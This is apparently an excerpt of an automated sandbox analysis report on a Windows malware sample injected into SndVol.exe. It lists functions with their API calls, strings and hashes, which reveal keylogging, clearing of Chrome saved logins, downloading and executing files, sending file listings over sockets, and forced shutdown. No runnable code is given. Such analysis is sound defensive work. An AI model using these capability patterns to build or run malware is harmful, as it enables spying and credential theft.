                                                                  • Instruction ID: 14fc2bdeb9e186a64a7bfff88fcdea73e54e7e7ccdcd372db98b0f676ae34473
                                                                  • Opcode Fuzzy Hash: d2b2406fb78086a357800fb68e00157406e6bc822482aaceecce54b7553cb521
                                                                  • Instruction Fuzzy Hash: 3751C331D00149ABDB04FB6ADD559FD777CAF12248F504B59E806E30A0EFB4BB498B82
                                                                  APIs
                                                                  • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040A98F
                                                                  • GetLastError.KERNEL32 ref: 0040A999
                                                                  Strings
                                                                  • [Chrome StoredLogins found, cleared!], xrefs: 0040A9BF
                                                                  • [Chrome StoredLogins not found], xrefs: 0040A9B3
                                                                  • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040A95A
                                                                  • UserProfile, xrefs: 0040A95F
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: DeleteErrorFileLast
                                                                  • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                  • API String ID: 2018770650-1062637481
                                                                  • Opcode ID: e2dc748f8a2f2c202dc5dfde2945bc6c5171a76981be289e4bc3f19e588866b0
                                                                  • Instruction ID: b2134abed7c3f614b53a5a28bf05479c5c2a11b403a78876888f6ce5fd1f590e
                                                                  • Opcode Fuzzy Hash: e2dc748f8a2f2c202dc5dfde2945bc6c5171a76981be289e4bc3f19e588866b0
                                                                  • Instruction Fuzzy Hash: 7801F271B9020466CA047A75DC2B8BE7728A921304B90057FF402732E2FE7D8A1586CF
                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32(00000028,?), ref: 00415C9D
                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00415CA4
                                                                  • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00415CB6
                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00415CD5
                                                                  • GetLastError.KERNEL32 ref: 00415CDB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                  • String ID: SeShutdownPrivilege
                                                                  • API String ID: 3534403312-3733053543
                                                                  • Opcode ID: 6b6a245ea7d04d36a7da703741a32f9ec851e6ff0cbdb80aef66d6ce6c3f9121
                                                                  • Instruction ID: ffc0972e6e84a8b4c82c7ff824774f91a9d221977230a9de1ecf93d0fe8dbf87
                                                                  • Opcode Fuzzy Hash: 6b6a245ea7d04d36a7da703741a32f9ec851e6ff0cbdb80aef66d6ce6c3f9121
                                                                  • Instruction Fuzzy Hash: 0AF03A71901229ABDB10ABA1ED4DEEF7F7CEF05616F510060B805A2152D6749A04CAB5
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 00408393
                                                                    • Part of subcall function 004048A8: connect.WS2_32(?,?,?), ref: 004048C0
                                                                    • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040842F
                                                                  • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 0040848D
                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 004084E5
                                                                  • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 004084FC
                                                                    • Part of subcall function 00404E06: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404E18
                                                                    • Part of subcall function 00404E06: SetEvent.KERNEL32(?,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404E23
                                                                    • Part of subcall function 00404E06: CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404E2C
                                                                  • FindClose.KERNEL32(00000000), ref: 004086F4
                                                                    • Part of subcall function 00404A81: WaitForSingleObject.KERNEL32(?,00000000,0040545D,?,?,00000004,?,?,00000004,?,00471E90,?), ref: 00404B27
                                                                    • Part of subcall function 00404A81: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00471E90,?,?,?,?,?,?,0040545D), ref: 00404B55
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                                                  • String ID:
                                                                  • API String ID: 1824512719-0
                                                                  • Opcode ID: 2d04ef65f79b6d4a761471fa0904ac1a104409f79b1bf8440fe588cad0436fe0
                                                                  • Instruction ID: 071b26812b5e49f88d0361c7bacc9152bfce797c8686ce15524b94070306fde2
                                                                  • Opcode Fuzzy Hash: 2d04ef65f79b6d4a761471fa0904ac1a104409f79b1bf8440fe588cad0436fe0
                                                                  • Instruction Fuzzy Hash: 4FB18D329001099BCB14FBA1CD92AEDB378AF50318F50416FE506B71E2EF785B49CB98
                                                                  APIs
                                                                    • Part of subcall function 00410201: SetLastError.KERNEL32(0000000D,00410781,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0041075F), ref: 00410207
                                                                  • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0041075F), ref: 0041079C
                                                                  • GetNativeSystemInfo.KERNEL32(?,0040BE60,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0041075F), ref: 0041080A
                                                                  • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 0041082E
                                                                    • Part of subcall function 00410708: VirtualAlloc.KERNEL32(00000004,00000004,00000004,00000004,0041084C,?,00000000,00003000,00000004,00000000,?,?), ref: 00410718
                                                                  • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00410875
                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 0041087C
                                                                  • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041098F
                                                                    • Part of subcall function 00410ADC: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,0041099C,?,?,?,?,?), ref: 00410B4C
                                                                    • Part of subcall function 00410ADC: HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 00410B53
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                                                  • String ID:
                                                                  • API String ID: 3950776272-0
                                                                  • Opcode ID: 97c9471a4feb21372bfec3f691305eac3cca21be586dff8f661e5b3b360a5f75
                                                                  • Instruction ID: 59628d97446cb481dba570c2b442d682f024dd9dc2812234181a156a821a4c1f
                                                                  • Opcode Fuzzy Hash: 97c9471a4feb21372bfec3f691305eac3cca21be586dff8f661e5b3b360a5f75
                                                                  • Instruction Fuzzy Hash: F7619270200211ABD750AF66CD91BAB7BA5BF44714F54412AF9158B382DBFCE8C1CBD9
                                                                  APIs
                                                                  • GetForegroundWindow.USER32(00472008,?,00472008), ref: 0040949C
                                                                  • GetWindowThreadProcessId.USER32(00000000,?), ref: 004094A7
                                                                  • GetKeyboardLayout.USER32(00000000), ref: 004094AE
                                                                  • GetKeyState.USER32(00000010), ref: 004094B8
                                                                  • GetKeyboardState.USER32(?), ref: 004094C5
                                                                  • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 004094E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: KeyboardStateWindow$ForegroundLayoutProcessThreadUnicode
                                                                  • String ID:
                                                                  • API String ID: 3566172867-0
                                                                  • Opcode ID: b347f1a6ebd5a27a3c62a6440ea9f983a5eff6272c066a99259600f45f129da1
                                                                  • Instruction ID: c7d3d650b917c490fc12d3d20248521073b1bf92526e1b13c177c4272b1ff9cc
                                                                  • Opcode Fuzzy Hash: b347f1a6ebd5a27a3c62a6440ea9f983a5eff6272c066a99259600f45f129da1
                                                                  • Instruction Fuzzy Hash: B9111E7290020CABDB10DBE4EC49FDA7BBCEB4C706F510465FA08E7191E675EA548BA4
                                                                  APIs
                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,00418656,00000000), ref: 00418A09
                                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,00418656,00000000), ref: 00418A1E
                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,00418656,00000000), ref: 00418A2B
                                                                  • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,00418656,00000000), ref: 00418A36
                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,00418656,00000000), ref: 00418A48
                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,00418656,00000000), ref: 00418A4B
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Service$CloseHandle$Open$ManagerStart
                                                                  • String ID:
                                                                  • API String ID: 276877138-0
                                                                  • Opcode ID: 637da124ebd858597763fdc0195e491a5d188b8048d228e092eb7bdd2ad61358
                                                                  • Instruction ID: d7e7041197745ae6b8576ac0eea0d71e7d0897d816d6b6e74118e31fa9ec717f
                                                                  • Opcode Fuzzy Hash: 637da124ebd858597763fdc0195e491a5d188b8048d228e092eb7bdd2ad61358
                                                                  • Instruction Fuzzy Hash: CAF082711012246FD211EB65EC89DBF2BACDF85BA6B41042BF801931918F78CD49A9B9
                                                                  APIs
                                                                  • FindFirstFileW.KERNEL32(00000000,?), ref: 00417D01
                                                                  • FindNextFileW.KERNEL32(00000000,?,?), ref: 00417DCD
                                                                    • Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040983B), ref: 0041A228
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: File$Find$CreateFirstNext
                                                                  • String ID: H"G$`'G$`'G
                                                                  • API String ID: 341183262-2774397156
                                                                  • Opcode ID: 0f8a9a1f3f484a1b985d0c82ab7c6f8e3835b992157b22e43b4eb6e7c3e49d61
                                                                  • Instruction ID: cc65440c5fe1593426504ff8613f72b7370ef7481f3bf724e026da4e35a467e2
                                                                  • Opcode Fuzzy Hash: 0f8a9a1f3f484a1b985d0c82ab7c6f8e3835b992157b22e43b4eb6e7c3e49d61
                                                                  • Instruction Fuzzy Hash: 138183315083415BC314FB62C996DEFB7A8AF90304F40493FF586671E2EF789A49C69A
                                                                  APIs
                                                                    • Part of subcall function 00415C90: GetCurrentProcess.KERNEL32(00000028,?), ref: 00415C9D
                                                                    • Part of subcall function 00415C90: OpenProcessToken.ADVAPI32(00000000), ref: 00415CA4
                                                                    • Part of subcall function 00415C90: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00415CB6
                                                                    • Part of subcall function 00415C90: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00415CD5
                                                                    • Part of subcall function 00415C90: GetLastError.KERNEL32 ref: 00415CDB
                                                                  • ExitWindowsEx.USER32(00000000,00000001), ref: 00414E56
                                                                  • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00414E6B
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00414E72
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                  • String ID: PowrProf.dll$SetSuspendState
                                                                  • API String ID: 1589313981-1420736420
                                                                  • Opcode ID: bb589c4a9e5ce4fb7329190ff839279ce61210147b3cfe0a03d1c41bdf58f902
                                                                  • Instruction ID: 748c18e79ee5f9a1fbb6f05bd7ad52209f91b0004c4d1b0055552a3b76c5c1f9
                                                                  • Opcode Fuzzy Hash: bb589c4a9e5ce4fb7329190ff839279ce61210147b3cfe0a03d1c41bdf58f902
                                                                  • Instruction Fuzzy Hash: 5F214F7070430157CE14FBB19896AAF6359AFD4349F40097FB5026B2D2EE7DCC4986AE
                                                                  APIs
                                                                  • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0044F93B,?,00000000), ref: 0044F6B5
                                                                  • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0044F93B,?,00000000), ref: 0044F6DE
                                                                  • GetACP.KERNEL32(?,?,0044F93B,?,00000000), ref: 0044F6F3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: InfoLocale
                                                                  • String ID: ACP$OCP
                                                                  • API String ID: 2299586839-711371036
                                                                  • Opcode ID: bf4880e5188eb12a7c294a6f25afa26b03a49e2ed1ffce5823e951fdb7c5b330
                                                                  • Instruction ID: bf1e89585aec8fc6a823a5c6a63220f2d7696aba51182a9853130589b0d37fa4
                                                                  • Opcode Fuzzy Hash: bf4880e5188eb12a7c294a6f25afa26b03a49e2ed1ffce5823e951fdb7c5b330
                                                                  • Instruction Fuzzy Hash: 2221C122A00101A6F7348F24C901A9B73AAAF50B65F578577E809C7221FB36DD4BC398
                                                                  APIs
                                                                  • FindResourceA.KERNEL32(SETTINGS,0000000A), ref: 004194A4
                                                                  • LoadResource.KERNEL32(00000000,?,?,?,0040DD9E), ref: 004194B8
                                                                  • LockResource.KERNEL32(00000000,?,?,?,0040DD9E), ref: 004194BF
                                                                  • SizeofResource.KERNEL32(00000000,?,?,?,0040DD9E), ref: 004194CE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Resource$FindLoadLockSizeof
                                                                  • String ID: SETTINGS
                                                                  • API String ID: 3473537107-594951305
                                                                  • Opcode ID: 7f61ee72686a272b8f551de58b86ae3e218e906a9fde472ee07ff8038d16bca4
                                                                  • Instruction ID: a9e8191b24fee58836060ebd07e0bd7776b83e69f4e337d8cda710b4f32c44fb
                                                                  • Opcode Fuzzy Hash: 7f61ee72686a272b8f551de58b86ae3e218e906a9fde472ee07ff8038d16bca4
                                                                  • Instruction Fuzzy Hash: 72E01A76200710ABCB211FA1FC5CD273E69F799B537050035FA0183222DA75CC00CA19
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 004087A5
                                                                  • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040881D
                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00408846
                                                                  • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040885D
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Find$File$CloseFirstH_prologNext
                                                                  • String ID:
                                                                  • API String ID: 1157919129-0
                                                                  • Opcode ID: bee7f5f2dbd26623ceae785115fe4ed72eb4a605c9ebee09c1c08c84f1d66a56
                                                                  • Instruction ID: 37d480644902bd8bd77a9749fd647df5a3db5b19bbca398f696489d34b7b99bb
                                                                  • Opcode Fuzzy Hash: bee7f5f2dbd26623ceae785115fe4ed72eb4a605c9ebee09c1c08c84f1d66a56
                                                                  • Instruction Fuzzy Hash: 12814D329001199BCB15EBA1DD929ED73B8AF54308F10427FE446B71E2EF385B49CB98
                                                                  APIs
                                                                    • Part of subcall function 00445725: GetLastError.KERNEL32(00000020,?,00438595,?,?,?,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B), ref: 00445729
                                                                    • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                                                    • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 0044579D
                                                                    • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                                                    • Part of subcall function 00445725: _free.LIBCMT ref: 00445784
                                                                    • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 00445791
                                                                  • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0044F8FC
                                                                  • IsValidCodePage.KERNEL32(00000000), ref: 0044F957
                                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 0044F966
                                                                  • GetLocaleInfoW.KERNEL32(?,00001001,00441F7E,00000040,?,0044209E,00000055,00000000,?,?,00000055,00000000), ref: 0044F9AE
                                                                  • GetLocaleInfoW.KERNEL32(?,00001002,00441FFE,00000040), ref: 0044F9CD
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                  • String ID:
                                                                  • API String ID: 745075371-0
                                                                  • Opcode ID: b2004c1cc1df407676deb5a86971a5ed3ade22d67ad87857b151b1318ee5498f
                                                                  • Instruction ID: 3a6be996f1d9ea25600d7609fa1d0555167a50dcc121ad64ff78238f3932635f
                                                                  • Opcode Fuzzy Hash: b2004c1cc1df407676deb5a86971a5ed3ade22d67ad87857b151b1318ee5498f
                                                                  • Instruction Fuzzy Hash: 0351A271900215AFFB20EFA5DC41BBF77B8AF08301F05447BE914EB251E7789A088769
                                                                  APIs
                                                                    • Part of subcall function 049264BD: GetLastError.KERNEL32(?,0491FC32,0491932D,0491FC32,00471E90,?,0491D9B2,FF8BC35D,00471E90,00471E90), ref: 049264C1
                                                                    • Part of subcall function 049264BD: _free.LIBCMT ref: 049264F4
                                                                    • Part of subcall function 049264BD: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 04926535
                                                                    • Part of subcall function 049264BD: _abort.LIBCMT ref: 0492653B
                                                                    • Part of subcall function 049264BD: _free.LIBCMT ref: 0492651C
                                                                    • Part of subcall function 049264BD: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 04926529
                                                                  • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 04930694
                                                                  • IsValidCodePage.KERNEL32(00000000), ref: 049306EF
                                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 049306FE
                                                                  • GetLocaleInfoW.KERNEL32(?,00001001,04922D16,00000040,?,04922E36,00000055,00000000,?,?,00000055,00000000), ref: 04930746
                                                                  • GetLocaleInfoW.KERNEL32(?,00001002,04922D96,00000040), ref: 04930765
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 048E0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_48e0000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                  • String ID:
                                                                  • API String ID: 745075371-0
                                                                  • Opcode ID: b2004c1cc1df407676deb5a86971a5ed3ade22d67ad87857b151b1318ee5498f
                                                                  • Instruction ID: 79561d9c86c80e84a56c41261f42c59b8ba0051b9c093c7aefd3b84377746d70
                                                                  • Opcode Fuzzy Hash: b2004c1cc1df407676deb5a86971a5ed3ade22d67ad87857b151b1318ee5498f
                                                                  • Instruction Fuzzy Hash: A2517071A00216AFEB20EFA5CC44ABE77BCFF86706F054579E954E7198E770E9008B61
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 0040784D
                                                                  • FindFirstFileW.KERNEL32(00000000,?,004632A8,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407906
                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040792E
                                                                  • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040793B
                                                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407A51
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                                                  • String ID:
                                                                  • API String ID: 1771804793-0
                                                                  • Opcode ID: 4df02c7b683598015195e59e2a1d7b54b12f13a119386a8b0a550fd93dbe50a1
                                                                  • Instruction ID: 4b9324871479917b5af30c26e04a30266e6971a3e86a210f007197118c0b57fe
                                                                  • Opcode Fuzzy Hash: 4df02c7b683598015195e59e2a1d7b54b12f13a119386a8b0a550fd93dbe50a1
                                                                  • Instruction Fuzzy Hash: 18516372904208AACB04FBA1DD969DD7778AF11308F50417FB846771E2EF389B49CB99
                                                                  APIs
                                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 004064D2
                                                                  • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004065B6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: DownloadExecuteFileShell
                                                                  • String ID: C:\Windows\SysWOW64\SndVol.exe$open
                                                                  • API String ID: 2825088817-1291576107
                                                                  • Opcode ID: 0200459f540584611f778afe4ab7dd214ac9f7c6233c4139519a742c6c6fbe69
                                                                  • Instruction ID: de45ecf938be0b84f02b1b366aeabb591a3e89dbb22835c7232af05a142efef6
                                                                  • Opcode Fuzzy Hash: 0200459f540584611f778afe4ab7dd214ac9f7c6233c4139519a742c6c6fbe69
                                                                  • Instruction Fuzzy Hash: 6F61D331A0430167CA14FB75D8A697E77A99F81708F00093FFD42772D6EE3D8A09869B
                                                                  APIs
                                                                  • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041A861
                                                                    • Part of subcall function 0041215F: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0041216E
                                                                    • Part of subcall function 0041215F: RegSetValueExA.KERNEL32(?,00464150,00000000,?,00000000,00000000,00472200,?,pth_unenc,0040E23B,00464150,3.8.0 Pro), ref: 00412196
                                                                    • Part of subcall function 0041215F: RegCloseKey.KERNEL32(?,?,pth_unenc,0040E23B,00464150,3.8.0 Pro), ref: 004121A1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CloseCreateInfoParametersSystemValue
                                                                  • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                  • API String ID: 4127273184-3576401099
                                                                  • Opcode ID: b8e930e406a51c142911afe7d42b80e3a9af200f2f362c56483f6d5d18d4ce76
                                                                  • Instruction ID: 146807b905f8226e4159dba151db05d0611ea4827dca33b530162433be1e3f9d
                                                                  • Opcode Fuzzy Hash: b8e930e406a51c142911afe7d42b80e3a9af200f2f362c56483f6d5d18d4ce76
                                                                  • Instruction Fuzzy Hash: 7C119671F8024037D514353A4D6BBAE18199343B50F54016BB6022B6CAF8EE4EA553DF
                                                                  APIs
                                                                    • Part of subcall function 00445725: GetLastError.KERNEL32(00000020,?,00438595,?,?,?,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B), ref: 00445729
                                                                    • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                                                    • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 0044579D
                                                                    • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                                                  • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00441F85,?,?,?,?,004419DC,?,00000004), ref: 0044EF9A
                                                                  • _wcschr.LIBVCRUNTIME ref: 0044F02A
                                                                  • _wcschr.LIBVCRUNTIME ref: 0044F038
                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00441F85,00000000,004420A5), ref: 0044F0DB
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                                  • String ID:
                                                                  • API String ID: 4212172061-0
                                                                  • Opcode ID: 2958d0d59106b2716bbf9024854ff4f325b6253e079e5f73fc6a0a954244a96d
                                                                  • Instruction ID: 651119c321e801f17dd1a7ba429a2dceeb4aa1bed9d5f8a21b6634afb1069130
                                                                  • Opcode Fuzzy Hash: 2958d0d59106b2716bbf9024854ff4f325b6253e079e5f73fc6a0a954244a96d
                                                                  • Instruction Fuzzy Hash: 8E61E935600606AAFB24AB36DC46BB773A8FF44714F14047FF905D7282EB78E9488769
                                                                  APIs
                                                                  • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 048E7680
                                                                  • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 048E7748
                                                                    • Part of subcall function 048E5819: send.WS2_32(?,00000000,00000000,00000000), ref: 048E58AE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 048E0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_48e0000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: FileFind$FirstNextsend
                                                                  • String ID: p2oup3ou 2ou
                                                                  • API String ID: 4113138495-232651861
                                                                  • Opcode ID: e3ef31e205124b2d37ce34f80ed01c56440b36d419931c260197812f3169fbb8
                                                                  • Instruction ID: d78368d8f297177c57b3120ad05a1d3a4c8886e437feb489dc654379acc32b78
                                                                  • Opcode Fuzzy Hash: e3ef31e205124b2d37ce34f80ed01c56440b36d419931c260197812f3169fbb8
                                                                  • Instruction Fuzzy Hash: E0218F316182059BD214FB69CC949FF77ACAF86318F404F29E986D2090EFB4BA098653
                                                                  APIs
                                                                  • IsDebuggerPresent.KERNEL32 ref: 004399A4
                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004399AE
